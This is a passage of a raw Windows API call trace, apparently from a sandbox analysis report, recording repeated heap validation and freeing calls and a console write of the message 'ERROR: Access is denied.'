[0176.294] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6808) returned 1 [0176.294] GetProcessHeap () returned 0x4a0000 [0176.294] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6808) returned 0x14 [0176.294] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6808 | out: hHeap=0x4a0000) returned 1 [0176.294] GetProcessHeap () returned 0x4a0000 [0176.294] GetProcessHeap () returned 0x4a0000 [0176.294] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6050) returned 1 [0176.295] GetProcessHeap () returned 0x4a0000 [0176.295] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6050) returned 0xc [0176.295] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6050 | out: hHeap=0x4a0000) returned 1 [0176.295] GetProcessHeap () returned 0x4a0000 [0176.295] GetProcessHeap () returned 0x4a0000 [0176.295] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6828) returned 1 [0176.295] GetProcessHeap () returned 0x4a0000 [0176.295] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6828) returned 0x14 [0176.295] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6828 | out: hHeap=0x4a0000) returned 1 [0176.295] GetProcessHeap () returned 0x4a0000 [0176.295] GetProcessHeap () returned 0x4a0000 [0176.295] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4090) returned 1 [0176.441] GetProcessHeap () returned 0x4a0000 [0176.441] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4090) returned 0x1a [0176.441] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4090 | out: hHeap=0x4a0000) returned 1 [0176.441] GetProcessHeap () returned 0x4a0000 [0176.441] GetProcessHeap () returned 0x4a0000 [0176.441] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6848) returned 1 [0176.441] GetProcessHeap () returned 0x4a0000 [0176.441] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6848) returned 0x14 [0176.441] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6848 | out: hHeap=0x4a0000) returned 1 [0176.442] GetProcessHeap () returned 0x4a0000 [0176.442] GetProcessHeap () returned 0x4a0000 [0176.442] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6868) returned 1 [0176.442] GetProcessHeap () returned 0x4a0000 [0176.442] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6868) returned 0x14 [0176.442] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6868 | out: hHeap=0x4a0000) returned 1 [0176.442] GetProcessHeap () returned 0x4a0000 [0176.442] GetProcessHeap () returned 0x4a0000 [0176.442] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6888) returned 1 [0176.442] GetProcessHeap () returned 0x4a0000 [0176.442] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6888) returned 0x14 [0176.442] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6888 | out: hHeap=0x4a0000) returned 1 [0176.442] GetProcessHeap () returned 0x4a0000 [0176.442] GetProcessHeap () returned 0x4a0000 [0176.443] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b40b8) returned 1 [0176.443] GetProcessHeap () returned 0x4a0000 [0176.443] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b40b8) returned 0x1a [0176.443] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b40b8 | out: hHeap=0x4a0000) returned 1 [0176.443] GetProcessHeap () returned 0x4a0000 [0176.443] GetProcessHeap () returned 0x4a0000 [0176.443] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b68a8) returned 1 [0176.443] GetProcessHeap () returned 0x4a0000 [0176.443] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b68a8) returned 0x14 [0176.443] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b68a8 | out: hHeap=0x4a0000) returned 1 [0176.443] GetProcessHeap () returned 0x4a0000 [0176.443] GetProcessHeap () returned 0x4a0000 [0176.443] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6068) returned 1 [0176.444] GetProcessHeap () returned 0x4a0000 [0176.444] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6068) returned 0xc [0176.444] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6068 | out: hHeap=0x4a0000) returned 1 [0176.444] GetProcessHeap () returned 0x4a0000 [0176.444] GetProcessHeap () returned 0x4a0000 [0176.444] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b68c8) returned 1 [0176.444] GetProcessHeap () returned 0x4a0000 [0176.444] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b68c8) returned 0x14 [0176.444] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b68c8 | out: hHeap=0x4a0000) returned 1 [0176.444] GetProcessHeap () returned 0x4a0000 [0176.444] GetProcessHeap () returned 0x4a0000 [0176.444] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6080) returned 1 [0176.444] GetProcessHeap () returned 0x4a0000 [0176.445] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6080) returned 0xe [0176.445] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6080 | out: hHeap=0x4a0000) returned 1 [0176.445] GetProcessHeap () returned 0x4a0000 [0176.445] GetProcessHeap () returned 0x4a0000 [0176.445] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b68e8) returned 1 [0176.445] GetProcessHeap () returned 0x4a0000 [0176.445] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b68e8) returned 0x14 [0176.445] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b68e8 | out: hHeap=0x4a0000) returned 1 [0176.445] GetProcessHeap () returned 0x4a0000 [0176.445] GetProcessHeap () returned 0x4a0000 [0176.445] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6908) returned 1 [0176.445] GetProcessHeap () returned 0x4a0000 [0176.445] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6908) returned 0x12 [0176.446] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6908 | out: hHeap=0x4a0000) returned 1 [0176.446] GetProcessHeap () returned 0x4a0000 [0176.446] GetProcessHeap () returned 0x4a0000 [0176.446] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6928) returned 1 [0176.446] GetProcessHeap () returned 0x4a0000 [0176.446] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b6928) returned 0x14 [0176.446] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6928 | out: hHeap=0x4a0000) returned 1 [0176.446] GetProcessHeap () returned 0x4a0000 [0176.446] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6948) returned 1 [0176.447] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6968) returned 1 [0176.447] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b40e0) returned 1 [0176.447] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6988) returned 1 [0176.447] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4108) returned 1 [0176.447] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b69a8) returned 1 [0176.447] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4130) returned 1 [0176.447] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b69c8) returned 1 [0176.447] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6098) returned 1 [0176.448] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b69e8) returned 1 [0176.448] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6f98) returned 1 [0176.448] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6a08) returned 1 [0176.448] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6fc8) returned 1 [0176.448] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6a28) returned 1 [0176.448] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6ff8) returned 1 [0176.448] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6a48) returned 1 [0176.448] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b60b0) returned 1 [0176.448] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6a68) returned 1 [0176.449] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7008) returned 1 [0176.449] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6a88) returned 1 [0176.449] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7018) returned 1 [0176.449] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6aa8) returned 1 [0176.449] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6ac8) returned 1 [0176.449] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6ae8) returned 1 [0176.449] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7048) returned 1 [0176.449] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6b08) returned 1 [0176.449] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b60c8) returned 1 [0176.450] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6b28) returned 1 [0176.450] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6b48) returned 1 [0176.450] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6b68) returned 1 [0176.450] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b60e0) returned 1 [0176.450] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6b88) returned 1 [0176.450] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6ba8) returned 1 [0176.450] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6bc8) returned 1 [0176.450] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6be8) returned 1 [0176.451] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6c08) returned 1 [0176.451] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b60f8) returned 1 [0176.451] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6c28) returned 1 [0176.451] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6110) returned 1 [0176.451] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6c48) returned 1 [0176.451] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6128) returned 1 [0176.451] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6c68) returned 1 [0176.451] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6140) returned 1 [0176.452] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6c88) returned 1 [0176.456] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6158) returned 1 [0176.456] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6ca8) returned 1 [0176.456] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7058) returned 1 [0176.456] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6cc8) returned 1 [0176.457] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b70b8) returned 1 [0176.457] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6ce8) returned 1 [0176.457] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7110) returned 1 [0176.457] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6d08) returned 1 [0176.457] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7168) returned 1 [0176.457] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6d28) returned 1 [0176.457] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b71c0) returned 1 [0176.457] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6d48) returned 1 [0176.458] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7218) returned 1 [0176.458] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6d68) returned 1 [0176.458] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7270) returned 1 [0176.458] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6d88) returned 1 [0176.458] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b72c8) returned 1 [0176.458] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6da8) returned 1 [0176.458] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7320) returned 1 [0176.458] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6dc8) returned 1 [0176.459] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7378) returned 1 [0176.459] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6de8) returned 1 [0176.459] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b73d0) returned 1 [0176.459] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6e08) returned 1 [0176.459] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7428) returned 1 [0176.459] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6e28) returned 1 [0176.459] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7480) returned 1 [0176.459] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6e48) returned 1 [0176.459] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b74d8) returned 1 [0176.460] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b6e68) returned 1 [0176.460] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7530) returned 1 [0176.460] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b80b8) returned 1 [0176.460] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7588) returned 1 [0176.460] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b80d8) returned 1 [0176.460] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b75e0) returned 1 [0176.460] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b80f8) returned 1 [0176.460] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7638) returned 1 [0176.461] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8118) returned 1 [0176.461] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7690) returned 1 [0176.461] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8138) returned 1 [0176.461] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b76e8) returned 1 [0176.461] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8158) returned 1 [0176.461] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7740) returned 1 [0176.461] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8178) returned 1 [0176.462] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b7798) returned 1 [0176.462] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b8198) returned 1 [0176.462] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b77f0) returned 1 [0176.462] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b81b8) returned 1 [0176.462] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5de0) returned 1 [0176.462] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af120) returned 1 [0176.462] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b53a8) returned 1 [0176.462] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af138) returned 1 [0176.462] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b53c8) returned 1 [0176.463] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af108) returned 1 [0176.464] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3bb8) returned 1 [0176.464] _memicmp (_Buf1=0x4af0f0, _Buf2=0xa1318, _Size=0x7) returned 0 [0176.464] LoadStringW (in: hInstance=0x0, uID=0x1389, lpBuffer=0x4b5b50, cchBufferMax=256 | out: lpBuffer="ERROR:") returned 0x6 [0176.464] lstrlenW (lpString="ERROR:") returned 6 [0176.464] GetProcessHeap () returned 0x4a0000 [0176.464] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0xe) returned 0x4af108 [0176.464] GetProcessHeap () returned 0x4a0000 [0176.464] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x10) returned 0x4af138 [0176.464] _memicmp (_Buf1=0x4af138, _Buf2=0xa1318, _Size=0x7) returned 0 [0176.464] GetProcessHeap () returned 0x4a0000 [0176.465] RtlAllocateHeap (HeapHandle=0x4a0000, Flags=0xc, Size=0x1000) returned 0x4b88a0 [0176.465] _vsnwprintf (in: _Buffer=0x4b88a0, _BufferCount=0x7ff, _Format="%s ", _ArgList=0x2bfd9c | out: _Buffer="ERROR: ") returned 7 [0176.466] _fileno (_File=0x76e62940) returned 2 [0176.466] _errno () returned 0x2007d8 [0176.466] _get_osfhandle (_FileHandle=2) returned 0xb [0176.466] _errno () returned 0x2007d8 [0176.466] GetFileType (hFile=0xb) returned 0x2 [0176.466] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0176.466] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2bfd34 | out: lpMode=0x2bfd34) returned 1 [0176.472] __iob_func () returned 0x76e62900 [0176.472] __iob_func () returned 0x76e62900 [0176.472] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0176.472] lstrlenW (lpString="ERROR: ") returned 7 [0176.472] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4b88a0*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x2bfd5c, lpReserved=0x0 | out: lpBuffer=0x4b88a0*, lpNumberOfCharsWritten=0x2bfd5c*=0x7) returned 1 [0176.473] _fileno (_File=0x76e62940) returned 2 [0176.473] _errno () returned 0x2007d8 [0176.473] _get_osfhandle (_FileHandle=2) returned 0xb [0176.473] _errno () returned 0x2007d8 [0176.473] GetFileType (hFile=0xb) returned 0x2 [0176.474] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0176.474] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x2bfd60 | out: lpMode=0x2bfd60) returned 1 [0176.474] __iob_func () returned 0x76e62900 [0176.474] __iob_func () returned 0x76e62900 [0176.474] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0176.474] lstrlenW (lpString="Access is denied.\r\n") returned 19 [0176.475] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0x4b50a8*, nNumberOfCharsToWrite=0x13, lpNumberOfCharsWritten=0x2bfd88, lpReserved=0x0 | out: lpBuffer=0x4b50a8*, lpNumberOfCharsWritten=0x2bfd88*=0x13) returned 1 [0176.475] GetProcessHeap () returned 0x4a0000 [0176.475] GetProcessHeap () returned 0x4a0000 [0176.475] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5268) returned 1 [0176.475] GetProcessHeap () returned 0x4a0000 [0176.475] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5268) returned 0x54 [0176.476] HeapFree (in: hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5268 | out: hHeap=0x4a0000) returned 1 [0176.476] GetProcessHeap () returned 0x4a0000 [0176.476] GetProcessHeap () returned 0x4a0000 [0176.476] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b52c8) returned 1 [0176.476] GetProcessHeap () returned 0x4a0000 [0176.476] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b52c8) returned 0x80 [0176.476] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5b50) returned 1 [0176.476] GetProcessHeap () returned 0x4a0000 [0176.476] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5b50) returned 0x200 [0176.476] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af0f0) returned 1 [0176.476] GetProcessHeap () returned 0x4a0000 [0176.476] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4af0f0) returned 0x10 [0176.476] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5388) returned 1 [0176.477] GetProcessHeap () returned 0x4a0000 [0176.477] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5388) returned 0x14 [0176.477] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b88a0) returned 1 [0176.477] GetProcessHeap () returned 0x4a0000 [0176.477] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b88a0) returned 0x1000 [0176.477] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af138) returned 1 [0176.477] GetProcessHeap () returned 0x4a0000 [0176.477] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4af138) returned 0x10 [0176.477] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5368) returned 1 [0176.477] GetProcessHeap () returned 0x4a0000 [0176.477] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5368) returned 0x14 [0176.477] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5038) returned 1 [0176.477] GetProcessHeap () returned 0x4a0000 [0176.477] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5038) returned 0x64 [0176.478] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af0d8) returned 1 [0176.478] GetProcessHeap () returned 0x4a0000 [0176.478] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4af0d8) returned 0x10 [0176.478] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4e58) returned 1 [0176.478] GetProcessHeap () returned 0x4a0000 [0176.478] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4e58) returned 0x14 [0176.478] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3f78) returned 1 [0176.478] GetProcessHeap () returned 0x4a0000 [0176.478] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3f78) returned 0x1e [0176.478] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af0c0) returned 1 [0176.478] GetProcessHeap () returned 0x4a0000 [0176.478] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4af0c0) returned 0x10 [0176.478] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4e38) returned 1 [0176.478] GetProcessHeap () returned 0x4a0000 [0176.479] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4e38) returned 0x14 [0176.479] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b50a8) returned 1 [0176.479] GetProcessHeap () returned 0x4a0000 [0176.479] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b50a8) returned 0x28 [0176.479] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3a18) returned 1 [0176.479] GetProcessHeap () returned 0x4a0000 [0176.479] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3a18) returned 0x14 [0176.479] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b5d58) returned 1 [0176.479] GetProcessHeap () returned 0x4a0000 [0176.479] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b5d58) returned 0x64 [0176.479] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3a38) returned 1 [0176.479] GetProcessHeap () returned 0x4a0000 [0176.479] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3a38) returned 0x14 [0176.480] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4ef0) returned 1 [0176.480] GetProcessHeap () returned 0x4a0000 [0176.480] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4ef0) returned 0x8 [0176.480] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3a58) returned 1 [0176.480] GetProcessHeap () returned 0x4a0000 [0176.480] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3a58) returned 0x14 [0176.480] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3a78) returned 1 [0176.480] GetProcessHeap () returned 0x4a0000 [0176.480] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3a78) returned 0x14 [0176.480] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b53c8) returned 1 [0176.480] GetProcessHeap () returned 0x4a0000 [0176.480] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b53c8) returned 0x14 [0176.480] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b53a8) returned 1 [0176.481] GetProcessHeap () returned 0x4a0000 [0176.481] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b53a8) returned 0x14 [0176.481] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af108) returned 1 [0176.481] GetProcessHeap () returned 0x4a0000 [0176.481] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4af108) returned 0xe [0176.481] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b53e8) returned 1 [0176.481] GetProcessHeap () returned 0x4a0000 [0176.481] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b53e8) returned 0x14 [0176.481] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af078) returned 1 [0176.481] GetProcessHeap () returned 0x4a0000 [0176.481] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4af078) returned 0x10 [0176.481] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b3a98) returned 1 [0176.481] GetProcessHeap () returned 0x4a0000 [0176.482] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b3a98) returned 0x14 [0176.482] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4db8) returned 1 [0176.482] GetProcessHeap () returned 0x4a0000 [0176.482] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4db8) returned 0x14 [0176.482] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4dd8) returned 1 [0176.482] GetProcessHeap () returned 0x4a0000 [0176.482] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4dd8) returned 0x14 [0176.482] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4b4df8) returned 1 [0176.482] GetProcessHeap () returned 0x4a0000 [0176.482] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4b4df8) returned 0x14 [0176.482] HeapValidate (hHeap=0x4a0000, dwFlags=0x0, lpMem=0x4af090) returned 1 [0176.482] GetProcessHeap () returned 0x4a0000 [0176.483] RtlSizeHeap (HeapHandle=0x4a0000, Flags=0x0, MemoryPointer=0x4af090) returned 0x10 [0176.483] HeapValidate 